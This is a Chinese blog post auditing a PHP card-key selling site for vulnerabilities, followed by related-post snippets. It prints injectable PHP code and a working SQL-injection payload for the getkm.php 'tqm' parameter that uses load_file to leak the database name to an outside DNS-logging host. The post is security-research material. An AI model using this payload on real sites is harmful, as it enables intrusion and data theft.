php发卡_发卡网代码审计

最新推荐文章于 2023-02-12 23:59:43 发布
最新推荐文章于 2023-02-12 23:59:43 发布
阅读量325 收藏
点赞数
文章标签: php发卡
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_36386044/article/details/113708377
版权

前言

好胸弟柠枫昨天dd了我一下,这不,叫我一起审计发卡的cms

479f784f83b80e7bb873407d97154e70.png

君无戏言,最近也在整二进制,当然要跟我的好胸弟一起组队py一下,不知道我都多久没审了,吐

咱语文也不是很好,各位看官就将就着看看就好,水文勿喷

8df8cad0ea906a438017ff3d84666cee.png

0x01.  首页功能点审计

5d881d3c618d7b025840f105acb30029.png

打开一看,发现不是mvc框架了,那就感觉没啥好看头了,对于发卡网这种功能一般情况下是没多少功能点让我getshell的(可能是我太菜,大佬也可以审计一波,交流交流)

ff9bc213923bb95f31d40e20f07f2d44.png

直接进来看一下发现这边没啥可以利用的,莫得慌,我们按照功能点来测,先买一下东西,抓个包,看下是神马

25d2f3ac57835a667f42939c874953fe.png

这边请求到了ajax.php这个页面,好家伙,我们就直接去ajax.php审计一波

76f936fe5c94f42a3fe5ca6ba595667e.png

咦??这这这,这直接拼接的吗,把我给整神了,一看到在where后面,完了

写死了,这没啥子用呀,拼接了也执行不了啥直接把条件写死了,我们继续往下看看

2758ee251c3b1a1fb3b81c2bb53eb4c1.png

本以为这边有爱情,我觉得我又行了,进去_if函数一看哟西,头大了,我丝毫不慌,咱们随缘挖洞,就不信全部都过滤了(好吧,关键地方就是过滤了)

可能我追求速度,没那么认真,然后粗略一看,我们继续看其他地方有没有

3e9a87b9d42f1a83879fe11079965d5a.png

b62160fd28d597048e145d20af9e0f8e.png

最后发现 C:\Users\86183\Desktop\faka\template\chiji\getkm.php 存在注入

也就是 getkm.php 存在注入,我们直接去看看这个页面,我们可以看到它这边是必会执行这下面这条语句,我们就直接在post包中添加 tqm 这个参数就行

template里面是个模板,然后 模板里面都存在 getkm.php,也就是说都存在这个注入

82e5c9b58b56e87814b813a45b2322fb.png

76064cb95b380181c0ad7cca7e7cc402.png

于是扔给了sqlmap跑,但是我发现这边不准确,不知道为什么,我本地搭建的也会延迟,等了好久,没有反应;

95dc8acca95e06bef5edcbfeeb5eab6e.png

b2a03b8fac613fb506810baca0769511.png

那就想想其他骚姿势,没有 mysql_error() 函数,报错注入就算了;

脑瓜子一转,我觉得可以使用 dns带外进行注入,说淦就淦

59f908105c0f0a475725a90bbab93922.png

先去构造一下payload

tqm=1' and (select load_file(concat('\\\\',(select database()),'.pdkzwo.ceye.io\\aaa')))#

4c69c1524b8b0b1c722f9c51f941149d.png

这就成功的执行了~~

转眼看看sqlmap

d9f7dbc0b61e5e53fb3226ffce307c79.png

还是就这样吧......

0x02.  后台功能点

884f28dd2cf6b601d8f3ab05284bcd06.png

然后我们就在这个订单这边审计,看看能审计出什么

<?php $pagesize=30;$pages=intval($numrows/$pagesize);if ($numrows%$pagesize){ $pages++; }if (isset($_GET['page'])){$page=intval($_GET['page']);}else{$page=1;}$offset=$pagesize*($page - 1);if(!empty($_GET['act']) && $_GET['act'] != null && $_GET['act'] == "sousuo"){    $pz = $_POST['pz'];    $sql = "SELECT * FROM if_order WHERE  out_trade_no like '%$pz%' or trade_no like '%$pz%' or rel  like '%$pz%'   order by id desc ";}else{    $sql = "SELECT * FROM if_order WHERE{$sql} order by id desc limit $offset,$pagesize";    // echo $sql;}$rs=$DB->query($sql);while($res = $DB->fetch($rs)){echo ''.$res['out_trade_no'].'
'.$res['trade_no'].''        . ''.getName($res['gid'],$DB).''.$res['rel'].''        . ''.$res['endTime'].''.$res['number'].'¥'.$res['money'].'('.getPayType($res['type']).')'.''.zt($res['sta']).'';}?>

这边出现intval函数,我们就放弃,然后我们继续往下看,看到了这一段

07549ff214600b7c0fce19bbb9746002.png

这.....完全的典型的注入,这边我们可以看到act传参sousuo,POST包传参pz就行了,注入点是在pz的地方

cf9d88d865c00df2fe811d3db5b92e17.png

像我这种脚本小子,都是扔sqlmap一把梭

a3c411fa26431dfe03b74e03047f83fc.png

然后就这样了,这个注入还是比较多的,我没去审计完;

9be6ee00092d4f66ad08bcea45433404.png

本人代码审计一般都是功能点审计,这也是我最常用,实战中也是比较常用的。功能点审计完后可以看看还有没有其他的漏洞,比如添加管理员的时候没有校验cookie等等的逻辑漏洞,然后再敏感函数查找,比如simplexml_load_string,unserilize,命令执行的函数等等

另外:需要源码练手的好胸嘚公众号私聊

申论荟
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
YKfaka优卡自动发卡程序漏洞合集(这是篇水文)
课嗨教育的专栏
08-09 2810
alert(/xss/)
代码审计(某个人发卡系统V6.0(php))
weixin_54227009的博客
11-10 331
只判断了文件的类型是否属于数组中的类型,并未对文件后缀进行判断,即造成任意文件上传。1、前台文件包含漏洞(如果开启了gbc,可远程包含)tyid没任何过滤,存在注入。需要抓包改一下文件类型。
窗体测试只能用于本地测试_卡密平台审计到getshell——本地测试
weixin_39856630的博客
11-25 92
本次渗透为本地测试,仅提供学术交流,切勿用于非法用途找了个源码搭建好了后台地址为默认的接下来就是找找源码中一些关键的文件了,发现getkm.php可能存在注入直接代入tqm参数,我们看看包含的common.php文件有没有过滤机制貌似只有个防cc和一个360站卫士,还好,能绕过。POST /getkm.php HTTP/1.1Host: 127.0.0.1User-Agent: Mozilla/...
发卡shell漏洞_邮件传输代理Exim远程命令执行漏洞细节披露,影响全球近一半邮件服务器...
weixin_32260275的博客
12-31 640
注意:是远程命令执行,不是远程代码执行Exim是一个MTA(Mail Transfer Agent,邮件传输代理)服务器软件,该软件基于GPL协议开发,是一款开源软件。该软件主要运行于类UNIX系统。通常该软件会与Dovecot或Courier等软件搭配使用。而近日,黑鸟从一些渠道发现,Exim官更新了最新4.92版本,并发布通告称,其Exim 4.87(包括) 到 4.91(包括)版...
Thinkphp企业级知宇自动发卡系统源码bug漏洞分析和修复
美奇软件开发工作室
04-29 6764
很多经营自动发卡业务的商家都是使用知宇的自动发卡系统,这个系统功能强大、业务完善,是个很不错的程序。这个系统使用Thinkphp5.0内核开发的,是一个完全开源的项目,这套系统在上早已泛滥(不值钱),泛滥的程序难免会被黑客利用,黑客通过研究这套系统,发现了系统不少的漏洞,也有一些黑客故意在源代码里植入木马或者后门,然后再发布出去给其他人使用,黑客的目的,无非就是想通过一些隐形的技术手段,修改系统的收款通道,从中获取利益。下面一起来分析这套系统的漏洞。
发卡评估报告
weixin_48421613的博客
09-15 839
发卡平台评估报告 概述 发卡平台是一套基于PHP+MYSQL为核心开发、免费、开源的发卡系统。支持支付宝,财付通,各类点卡等支付方式,适合个人或者企业搭建发卡平台。 发卡平台存在SQL注入、XSS注入、无密码登录、文件上传和文件解析漏洞。 漏洞描述 1.前台卡密购买sql注入,相关文件:./ajax.php及./getkm.php 2.前台卡密购买xss注入,相关文件:./ajax.php 3.失效的访问控制 4.信息泄露 5.文件上传 6.代码注入,相关文件:emailConfig.php SQL注入 前
泽宇发卡OR知宇发卡_发卡通杀.rar
04-09
3. 定期进行代码审计和安全扫描,及时发现并修复潜在的安全隐患。 4. 提升服务器的防护能力,如使用防火墙、入侵检测系统等,防止恶意请求的执行。 5. 建立完善的安全更新机制,确保所有使用的框架和库都是最新、最...
2024最新红盟发卡源码开元无加密免费首页模版3套
最新发布
04-27
红盟发卡源码采用现代Web开发技术构建,可能包含但不限于以下技术:PHP作为后端编程语言,MySQL作为数据库管理系统,HTML/CSS/JavaScript等前端技术进行页面展示。开源的特性使得开发者可以深入理解代码逻辑,更...
珊瑚云发卡平台源码压缩包
12-26
该源码可以用于搭建自己的发卡系统,同时,由于它提供了一个实践环境,也适合作为学习和练习【代码审计】的素材。 源码的核心功能可能包括: 1. **用户管理**:用户注册、登录、个人信息管理等功能,确保用户安全...
PHP独角发卡源码.zip
09-08
这涉及到代码审计、数据加密、防火墙配置等多个层面。 7. **统计报表**:生成销售报表,展示销售额、订单量、热门商品等数据,以便于运营分析和决策。 8. **后台管理**:提供给管理员进行日常操作的后台界面,包括...
代码审计之彩虹代刷系统1
08-03
首先,【标题】提到的“代码审计之彩虹代刷系统1”是一个关于络安全专家对代刷站进行安全评估的例子。【描述】指出,代刷站在互联上非常常见,因此对其进行代码审计是必要的。审计过程中使用的环境是...
络安全:绕过MSF的一次渗透测试
A_991128a的博客
02-12 407
这次渗透的主站是 一个Discuz!3.4 的搭建 违法招piao 站, 配置有宝塔WAF用 Discuz!ML 3.X 的漏洞进行攻击,但是没有成功发现主站外链会有一个发卡,引导人们来这充值,是 某某发卡,而且域名指向也是主站的ip,两个站在同一个 ,此处忘记截图了上有通杀payload,写shell的过程在这里省略了。
PHP发卡整合Java支付宝扫码接口(原创)
Java小胡的博客
08-15 517
前言:大家好,我主要使用的是Java开发语言。PHP只是略懂,但上那些开源的基本都是PHP写的,所以我用上开源的PHP发卡对接了我自己用Java写的支付接口,完成整站整合,完美衔接。 ·
PHP在线自动发卡源码 一键安装版
php源码
03-06 689
介绍: 在线自动发卡源码是采用php+mysql进行开发的自动发卡支付平台。 特色:三级会员价,电脑端7个模板,手机端4模板,宝贝密码查看等… 运行环境 PHP7.0+MYSQL5.6   安装说明: 安装 http://你的域名/install.php进行安装 后台路径http://你的域名/admin 盘下载地址: https://zijiewangpan.com/zwNY9c77RmA 图片: ...
php自动发卡程序8.0_「亲测」2020新版个人自动发卡源码 php完整个人发卡搭建源码...
weixin_34098846的博客
02-28 1607
「亲测」2020新版个人自动发卡源码 php完整个人发卡搭建源码一款shiyong原生php开发的个人自动发卡源码,数据库底层使用Eloquent ORM组件,模板渲染使用Smarty3.1组件,会话保持使用session开发,源码已搭建测试,系统环境,要求php>=7.2、MySQL版本>=5.6,如果你满足这两个条件,表示你已经具备了安装条件,服务器可以是Nginx或者apach...
发卡(另一版本)的代码审计
https://www.cnblogs.com/zpchcbd/
05-03 642
/other/codepay_notify.php 存在SQL注入 <?php define('SYSTEM_ROOT_E', dirname(__FILE__) . '/'); include '../ayangw/common.php'; // 包含一个文件 ksort($_POST); //排序post参数 reset($_POST); //内部指针指向数组中的第一个元素 $si...
php代码访问记录系统,对某PHP发卡系统代码审计记录
weixin_35084134的博客
03-29 271
最近都是PWN,审计,渗透并行,好久没看取证了…Local Env Setup有几个点说一下:第一个是cms要求php_curl扩展,当我修改了php.ini的扩展后,程序检测还是有点问题,所以把当前php的路径添加到环境变量中即可(或者换了php版本后就好了)。第二个就是php7.3.4运行该cms有问题,其他的测试了5.2、5.5、7.4均可。Code Excute Path Analysis...
代码审计faka2
m0_55772907的博客
05-02 1259
一、工具 seay源代码审计系统 二、漏洞 1、文件包含 主页index.php 没有过滤 gpc没有开启就可以本地包含,远程包含开启的话,直接可以写一个木马文件 在站根目录新建一个phpinfo.php访问,在址主页 http://www.faka.com/index.php?tp=default&action=../../phpinfo 解决办法:1、 2、开启gpc也可以 2、sql盲注注入 和首页的index.php在同一目录的ajax.php 可以
写一个发卡小程序前端代码
09-08
### 回答1: 我们可以使用 HTML、CSS 和 JavaScript 来编写前端代码,实现发卡的小程序。下面是一个示例代码: <html> <head> <title>发卡小程序</title> <style> #card-container { width: 300px; height: 200px; padding: 10px; border: 1px solid #ccc; } </style> </head> <body> <div id="card-container"> <h1>发卡小程序</h1> <form> <input type="text" placeholder="请输入卡号" /> <input type="submit" value="发卡" /> </form> </div> <script> const form = document.querySelector('form'); form.addEventListener('submit', (e) => { e.preventDefault(); alert('卡号发送成功!'); }); </script> </body> </html> ### 回答2: 发卡小程序前端代码是用来实现用户发卡操作的界面和交互逻辑的代码。以下是一个简单的发卡小程序前端代码实现: ```html <!DOCTYPE html> <html> <head> <meta charset="UTF-8"> <title>发卡小程序</title> <script src="https://cdn.bootcdn.net/ajax/libs/jquery/3.6.0/jquery.min.js"></script> </head> <body> <h1>发卡小程序</h1> <form id="cardForm"> <label for="cardNumber">卡号:</label> <input type="text" id="cardNumber" name="cardNumber" required><br><br> <label for="cardAmount">面额:</label> <input type="text" id="cardAmount" name="cardAmount" required><br><br> <input type="submit" value="发卡"> </form> <div id="result"></div> <script> $(document).ready(function() { $('#cardForm').submit(function(e) { e.preventDefault(); var cardNumber = $('#cardNumber').val(); var cardAmount = $('#cardAmount').val(); // 使用Ajax向后端发送发卡请求 $.ajax({ type: "POST", url: "/api/sendCard", data: { cardNumber: cardNumber, cardAmount: cardAmount }, success: function(response) { // 发卡成功,显示发卡结果 $('#result').text(response.message); }, error: function(xhr, status, error) { // 发卡失败,显示错误信息 $('#result').text("发卡失败,错误信息:" + xhr.responseText); } }); }); }); </script> </body> </html> ``` 以上代码中,使用HTML和JavaScript实现了一个简单的发卡小程序前端界面。用户需要填写卡号和面额,并点击"发卡"按钮提交表单。通过Ajax请求将表单数据发送到后端接口"/api/sendCard",后端根据收到的数据进行处理,并返回发卡结果。最后,前端根据后端返回的结果显示发卡成功或失败的提示信息。 ### 回答3: 发卡小程序的前端代码主要包括页面布局和交互逻辑。以下是一个简单的示例: ```html <!DOCTYPE html> <html lang="zh-CN"> <head> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <title>发卡小程序</title> <link rel="stylesheet" href="styles.css"> </head> <body> <div id="app"> <h1>发卡小程序</h1> <form id="card-form"> <label for="card-number">卡号:</label> <input type="text" id="card-number" required> <label for="card-value">面值:</label> <input type="number" id="card-value" required> <button type="submit">发卡</button> </form> <div id="cards-list"> <h2>发卡记录:</h2> <ul id="cards"> <!-- 动态生成发卡记录 --> </ul> </div> </div> <script src="script.js"></script> </body> </html> ``` ```css /* styles.css */ body { font-family: Arial, sans-serif; margin: 0; padding: 20px; } h1 { text-align: center; } form { margin-top: 20px; } form label { display: block; margin-bottom: 5px; } form input { display: block; width: 100%; padding: 5px; margin-bottom: 10px; } button { display: block; width: 100%; padding: 10px; background-color: #337ab7; color: #fff; border: none; cursor: pointer; } button:disabled { background-color: #ccc; cursor: not-allowed; } #cards-list { margin-top: 20px; } #cards-list h2 { margin-bottom: 10px; } ``` ```javascript // script.js document.addEventListener('DOMContentLoaded', function() { const form = document.getElementById('card-form'); const cardNumberInput = document.getElementById('card-number'); const cardValueInput = document.getElementById('card-value'); const cardsList = document.getElementById('cards'); form.addEventListener('submit', function(e) { e.preventDefault(); const cardNumber = cardNumberInput.value; const cardValue = cardValueInput.value; if (cardNumber !== '' && cardValue !== '') { const li = document.createElement('li'); li.textContent = `卡号: ${cardNumber}, 面值: ${cardValue}`; cardsList.appendChild(li); cardNumberInput.value = ''; cardValueInput.value = ''; } }); }); ``` 以上是一个简单的发卡小程序的前端代码。用户可以输入卡号和面值,然后点击发卡按钮,程序将卡号和面值添加到发卡记录中。发卡记录以列表的形式展示在页面上。当用户点击发卡按钮时,会发生表单提交事件,通过JavaScript代码来处理并更新发卡记录。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值